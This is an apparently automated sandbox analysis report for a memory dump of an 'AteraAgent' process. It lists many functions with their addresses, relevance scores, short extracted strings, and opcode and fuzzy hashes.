                                                                                                                                                                                                                                          • Instruction ID: 4f8a9662c2eabbda9acb29ba065d85abdfbd0a78e28555faa35b398d1d99d3dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bff57dd0187cad6e0739a300ba4554a720f06b5cee3e2fcb48dbd290b422fd8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C22E130A1D7868FE758DB18848153A77E5FF96740F24817DD48FC32A6DE29EC0A8792
                                                                                                                                                                                                                                          Function 00007FFAAB584DC8 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0DO
                                                                                                                                                                                                                                          • API String ID: 0-2831280591
                                                                                                                                                                                                                                          • Opcode ID: cf069d02932fc5248dda074bd2484001678775fc947c65eda6c09ac422cf9bb7
                                                                                                                                                                                                                                          • Instruction ID: 1ac0a2781bd1f7515880d9ea04534a4b8bbee44a612cf33e112ed9820e9e0643
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf069d02932fc5248dda074bd2484001678775fc947c65eda6c09ac422cf9bb7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C071AE70D0A64A8FEB94DF68C4557B977F1EF56380F5080BAD00ED72A2CE385985DB80
                                                                                                                                                                                                                                          Function 00007FFAAB59E33A Relevance: .8, Instructions: 805COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: bb8f47f431b687982151b7b2960b3320bb3a7b32e558da7bd5e2f3e1ed695425
                                                                                                                                                                                                                                          • Instruction ID: 51401b54674f871e6c00e2fb7111b52b1e981b6593669a07d8ffbab48b755e1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb8f47f431b687982151b7b2960b3320bb3a7b32e558da7bd5e2f3e1ed695425
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68024A61A0DA868FEBA4EB2CC455AB837D1EF56340F0881FAD44EC71A7DD25AC4D87C1
                                                                                                                                                                                                                                          Function 00007FFAAB59D314 Relevance: .5, Instructions: 537COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ee44727a0753ba35d80126c8165059e52fc3d4b8107f4ba9957609c23b4d3104
                                                                                                                                                                                                                                          • Instruction ID: 7b664d38a273ad29dcb0fd21beecbe095b55158e80a784bb2e133ca3a288b946
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee44727a0753ba35d80126c8165059e52fc3d4b8107f4ba9957609c23b4d3104
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F1C630A0DA498FDB59DB28C4546B97BE1FF95300F14826ED48FC72E6DE25A846CBC1
                                                                                                                                                                                                                                          Function 00007FFAAB59C920 Relevance: .4, Instructions: 382COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 879172f2a3bb554cf98c4cd4413b0f913c704df8c449ec1c14f1717ecf642e50
                                                                                                                                                                                                                                          • Instruction ID: 7785942f4706b5e45565b933b01dd1de0b19192787ee57110d402d11f8afaf29
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 879172f2a3bb554cf98c4cd4413b0f913c704df8c449ec1c14f1717ecf642e50
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6C1B871A18A4E8FDFD4EF1CC445AA93BE5FF69390F04417AE40ED32A2CE25D8558B80
                                                                                                                                                                                                                                          Function 00007FFAAB5A1BFE Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1933e221309545c12060eec020293909bfaa55b0a0d0dbcce5cac7d9d4904edb
                                                                                                                                                                                                                                          • Instruction ID: 0e8916dfe7f9edad8b06949f8d8cdaaa7e7a8011d52ce958453b7ca2ab25a310
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1933e221309545c12060eec020293909bfaa55b0a0d0dbcce5cac7d9d4904edb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CED1983151DB86CFD759DF28C054AA2BBE1FF66300F04C6ADD49E872A2DA34E449CB91
                                                                                                                                                                                                                                          Function 00007FFAAB58634D Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9212fe1a51965a3947bb8c3025e3de18c3997ec5769e783f138ce117892073e4
                                                                                                                                                                                                                                          • Instruction ID: c7df3e5e7ac930e875243fca69c1a5073e9f8a13e68f3d01f32d981f586566e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9212fe1a51965a3947bb8c3025e3de18c3997ec5769e783f138ce117892073e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2B17E70D0965ECFEB99DB68C4947BD77B5EF56340F5480BAC00ED3292CA346989DB80
                                                                                                                                                                                                                                          Function 00007FFAAB58AB08 Relevance: 5.4, Strings: 4, Instructions: 403COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: }G$0pO$P~G$tO
                                                                                                                                                                                                                                          • API String ID: 0-3089263112
                                                                                                                                                                                                                                          • Opcode ID: 6197e30d4ec20222f69116548cb2096c35df2547cb8c62c59b83258775803e39
                                                                                                                                                                                                                                          • Instruction ID: 838b9ba09dd2b385bff54e2bf4fcf7f12bae898c540dc2665daa97a761936afc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6197e30d4ec20222f69116548cb2096c35df2547cb8c62c59b83258775803e39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABC1F821A0EA4B8FE795EBAC845977877D9EF56340F0441FAD44ECB1B3DD1AAC098780
                                                                                                                                                                                                                                          Function 00007FFAAB59C375 Relevance: 4.1, Strings: 3, Instructions: 337COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 8hG$8hG$GQ_H
                                                                                                                                                                                                                                          • API String ID: 0-1314393891
                                                                                                                                                                                                                                          • Opcode ID: cca1c3b44fde9605f8f7f4213d63f77d1b056b3651a53a6a87c93b303f5e81de
                                                                                                                                                                                                                                          • Instruction ID: a2f1e03e561c1b4ffaa6dd35a8978f6a2746ed1e0a6b6896b7a37ffdb414bad6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cca1c3b44fde9605f8f7f4213d63f77d1b056b3651a53a6a87c93b303f5e81de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28A16753A0DA579FE311673CF8451F92B94EF873B4F0441BBC08E8A0D3DA19688B8AD5
                                                                                                                                                                                                                                          Function 00007FFAAB587DC8 Relevance: 4.0, Strings: 3, Instructions: 279COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0DO$0DO$0DO
                                                                                                                                                                                                                                          • API String ID: 0-3543897194
                                                                                                                                                                                                                                          • Opcode ID: 566367efd6ee0921e7f17fe670e581c4943aa5d748e9a705c3de92bc6248d9c3
                                                                                                                                                                                                                                          • Instruction ID: 9e6d0eb5c092b343ce24d9efec5f11ac0d3f2475b20bf1f4712018ca345bdd97
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 566367efd6ee0921e7f17fe670e581c4943aa5d748e9a705c3de92bc6248d9c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1191C271919A4F8FEB98EFA8C8556BDB7E1FF49340F044579E00ED3293CE2468068790
                                                                                                                                                                                                                                          Function 00007FFAAB59CDD1 Relevance: 3.0, Strings: 2, Instructions: 549COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 8hG$/E
                                                                                                                                                                                                                                          • API String ID: 0-4161705399
                                                                                                                                                                                                                                          • Opcode ID: 18d6751929317e68d5c0ae841cce2db2f4e3dbd53a594f0f37131de1c8529068
                                                                                                                                                                                                                                          • Instruction ID: 4491ec3e608f931c6d8a132953385e870e4b06b4de146eb11ee5175700b503a4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18d6751929317e68d5c0ae841cce2db2f4e3dbd53a594f0f37131de1c8529068
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2202476190D7868FE7259B3884982B97BA5EF57340F4481BFD04FC71E3DD29A80A83D1
                                                                                                                                                                                                                                          Function 00007FFAAB5886DA Relevance: 2.8, Strings: 2, Instructions: 343COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G$p[G
                                                                                                                                                                                                                                          • API String ID: 0-1094101947
                                                                                                                                                                                                                                          • Opcode ID: 6f3853f78d07895941467f4b4577f069e54324118f9a1b136ebb79de04ed1557
                                                                                                                                                                                                                                          • Instruction ID: f48049ca7d7fd93d13454dc34170a85a70361c8bf834b87ad6fe8727badc8910
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f3853f78d07895941467f4b4577f069e54324118f9a1b136ebb79de04ed1557
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05B10531D0964A8FE7A8DBA8C8457F87BF5EF46350F0441BAD04ED71A2CE38194ACB90
                                                                                                                                                                                                                                          Function 00007FFAAB58DE79 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: J9E$plO
                                                                                                                                                                                                                                          • API String ID: 0-377826821
                                                                                                                                                                                                                                          • Opcode ID: 01a73fd839d36f389dccdc44412a396720a960be67f80258def0d50565fe4535
                                                                                                                                                                                                                                          • Instruction ID: 819864037eeef07a86ea4d17ccba778fadcf9c7b9d0772a42c2cc428750e2b34
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01a73fd839d36f389dccdc44412a396720a960be67f80258def0d50565fe4535
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F914C61A1CB868FE749DB6C984597537E5EFA6780F0041BEE08EC72E3DD14EC468782
                                                                                                                                                                                                                                          Function 00007FFAAB58A6B0 Relevance: 2.8, Strings: 2, Instructions: 304COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E$b4E
                                                                                                                                                                                                                                          • API String ID: 0-1936144184
                                                                                                                                                                                                                                          • Opcode ID: 4ef14536ae376dea36eeeb21f3319fe035b0d8bd30b7476eee87a54c2a48eb15
                                                                                                                                                                                                                                          • Instruction ID: 4ed2c20cf7c435c4fdf61e2ecbc9e0e4f40d66382d74b18fa84228860acbd091
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef14536ae376dea36eeeb21f3319fe035b0d8bd30b7476eee87a54c2a48eb15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A816962B0DA4A4FE758976CA4561B937D9EB9A390F0441BFD04EC32E3ED16A80B43C1
                                                                                                                                                                                                                                          Function 00007FFAAB5948A4 Relevance: 2.8, Strings: 2, Instructions: 303COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: b4E$b4E
                                                                                                                                                                                                                                          • API String ID: 0-3606647801
                                                                                                                                                                                                                                          • Opcode ID: c6c718622d044986d9ae1f030e4f4c27a0cd7fbf9a5893aaf0a35911d1b2f23e
                                                                                                                                                                                                                                          • Instruction ID: c0c6224de4a9f80d53298fde5703061884dfdc64def59eeed67afa30b84ae006
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6c718622d044986d9ae1f030e4f4c27a0cd7fbf9a5893aaf0a35911d1b2f23e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F916371A18B4A8FD768DB28C4819A677E5FF52350B14867ED08FC31A7DE25F8468BC0
                                                                                                                                                                                                                                          Function 00007FFAAB58F2D4 Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: /W_H$8hG
                                                                                                                                                                                                                                          • API String ID: 0-1405751336
                                                                                                                                                                                                                                          • Opcode ID: a0714717fe0ece79ab85cb639f28812f2e71e922bafd06320c9406e774a9bd0b
                                                                                                                                                                                                                                          • Instruction ID: bf05ac0afba71f38d5e294725216a97acb863b6938241da9e333e5a96646c2d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0714717fe0ece79ab85cb639f28812f2e71e922bafd06320c9406e774a9bd0b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01A1747191964E8FE798EBA8D8956FC77B5FF99340F0005FAD00ED21A2DF3459868B80
                                                                                                                                                                                                                                          Function 00007FFAAB594131 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: }G$r6E
                                                                                                                                                                                                                                          • API String ID: 0-3561845606
                                                                                                                                                                                                                                          • Opcode ID: 8b364e914821058d8ab97170da55efdda0c0d137e8e360d6214f60ef608b62b4
                                                                                                                                                                                                                                          • Instruction ID: f3d8863edd5bac56b96ef517786266eb06853366ca80aa1a4632cc4e62f9ecc8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b364e914821058d8ab97170da55efdda0c0d137e8e360d6214f60ef608b62b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36517D71919A1E8FEBB8DB68D8953E877B5FF59340F4041BAD00ED3292CE355D468B80
                                                                                                                                                                                                                                          Function 00007FFAAB58CDF3 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: X`O$vL_^
                                                                                                                                                                                                                                          • API String ID: 0-3628153963
                                                                                                                                                                                                                                          • Opcode ID: 227cd22d730c45b48bdc425acc97308e9897b7d98092c1814b0e6b8a25033b77
                                                                                                                                                                                                                                          • Instruction ID: 4ba2b72a360d11fc817a50f72f4e4a1b2cdacfca53efdb38deaf59a4ab02d09a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 227cd22d730c45b48bdc425acc97308e9897b7d98092c1814b0e6b8a25033b77
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC413772B1DA498FE759DB6C985A5B93BE1EF9B350B0440BBE04EC72A3CD105C0687C1
                                                                                                                                                                                                                                          Function 00007FFAAB58A020 Relevance: 1.7, Strings: 1, Instructions: 481COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: HkH
                                                                                                                                                                                                                                          • API String ID: 0-2048587430
                                                                                                                                                                                                                                          • Opcode ID: c0ed586fac6acb3a1bf6fdd1d0c4b672657783ecb9d5e9b69bc4c1005ca9cd7a
                                                                                                                                                                                                                                          • Instruction ID: d521b42bf61a5237d41a004b7ded08b181e9b889dfded5ccbe8d15d72a46cd52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0ed586fac6acb3a1bf6fdd1d0c4b672657783ecb9d5e9b69bc4c1005ca9cd7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BE1D870A1CB4A8FE794EB28C44567AB7D1FF95340F50857EE44EC72A3DE34A8458B82
                                                                                                                                                                                                                                          Function 00007FFAAB5943F7 Relevance: 1.7, Strings: 1, Instructions: 459COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: cd0baef1094badceecb7d571b94391628c38192ee50ac563c65b046147ae1be4
                                                                                                                                                                                                                                          • Instruction ID: 1f574930babf9cf27b93fda1f02af200fd23fd6d8898c23ffc7d00af8c2fd850
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd0baef1094badceecb7d571b94391628c38192ee50ac563c65b046147ae1be4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCE1EF70A19B8A8FE768DB58C44067977E5EF96340F1485BAD04EC32A7CA26EC4687C1
                                                                                                                                                                                                                                          Function 00007FFAAB597146 Relevance: 1.7, Strings: 1, Instructions: 457COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: HkH
                                                                                                                                                                                                                                          • API String ID: 0-2048587430
                                                                                                                                                                                                                                          • Opcode ID: 1aeb5bcc9b8d9974cf3f0518011917bbc83abb0b0bb73b6b0978e498af96399c
                                                                                                                                                                                                                                          • Instruction ID: 24aa1e426c39de57d8de07dbb0e144519b9082e9066210352cc22485991f4073
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aeb5bcc9b8d9974cf3f0518011917bbc83abb0b0bb73b6b0978e498af96399c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62E1F970A1CB4A8FD794EF28C45566A77D2FF95340F10857ED44EC72A3DE34A8458B82
                                                                                                                                                                                                                                          Function 00007FFAAB5A0EF6 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0XO
                                                                                                                                                                                                                                          • API String ID: 0-3187520475
                                                                                                                                                                                                                                          • Opcode ID: 376bb9e88738c5cb2eef1609a02640adde3311a307f21dcc571bc3d1512d8dcd
                                                                                                                                                                                                                                          • Instruction ID: d2ec1fc4f3d55f60ebd1202cc2b4639cd0988f939159b903d3f0da14668ed643
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 376bb9e88738c5cb2eef1609a02640adde3311a307f21dcc571bc3d1512d8dcd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AD15B71A1DA4A8FEB98EB2CC45AA7837D5EF56340B0441BED44EC71A3DD24EC4687C1
                                                                                                                                                                                                                                          Function 00007FFAAB5906AA Relevance: 1.7, Strings: 1, Instructions: 417COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: 36a263e9e0a6d3190ca2c7d0009a084122f671b412460903e8380156ae03da72
                                                                                                                                                                                                                                          • Instruction ID: 86f529187f9db26ecf75f49a2bb6ac3f0667606b8d11d4a26f8343da8a1048ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a263e9e0a6d3190ca2c7d0009a084122f671b412460903e8380156ae03da72
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DC14530A1DB468FE759DB58C44197577E5EF96390B1889BDD08EC31A3CA25F8078BC1
